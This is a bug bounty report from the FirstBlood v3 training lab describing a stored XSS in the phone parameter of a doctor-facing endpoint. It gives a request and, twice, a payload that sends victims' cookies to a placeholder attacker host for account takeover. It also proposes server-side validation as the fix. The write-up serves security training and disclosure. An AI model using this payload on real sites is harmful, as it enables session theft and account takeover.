FirstBlood-#1335Stored XSS to account takeover of doctors
This issue was discovered on FirstBlood v3

On 2022-12-09, pichik Level 4 reported:



Joining event function is vulnerable to XSS in phone number parameter.

If you visit you can join the event by submiting your name and phone.
phone parameter have weak - client side only protection, which check if value is just number. You can bypass this by intercepting request with burp and change payload there.
Here is simple alert payload:

POST /api/hackerback.php HTTP/1.1
Cookie: drps=35187c4f3abda278280e775d6
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36


Attacker can use payload like this:
"><script> window.location.href="[attacker-id]?"%2Bdocument.cookie;</script>
to redirect doctors to his site and steal their cookies, by appending them to the url.
Cookies are missing httponly flag, which allows them to be accessed from the script.

To trigger this XSS, Doctors just need to visit:
which is main endpoint for doctors, so after loggin in every doctor is affected.



Attacker can take over any doctor that logs in.


There is only clientside check, if phone parameter is number only, which can be easily bypassed with proxy, so by adding additional serverside check should fix this issue.


Endpoint: /api/hackerback.php

Parameter: phone

Payload: "><script> window.location.href="[your-id]?"%2Bdocument.cookie;</script>

FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.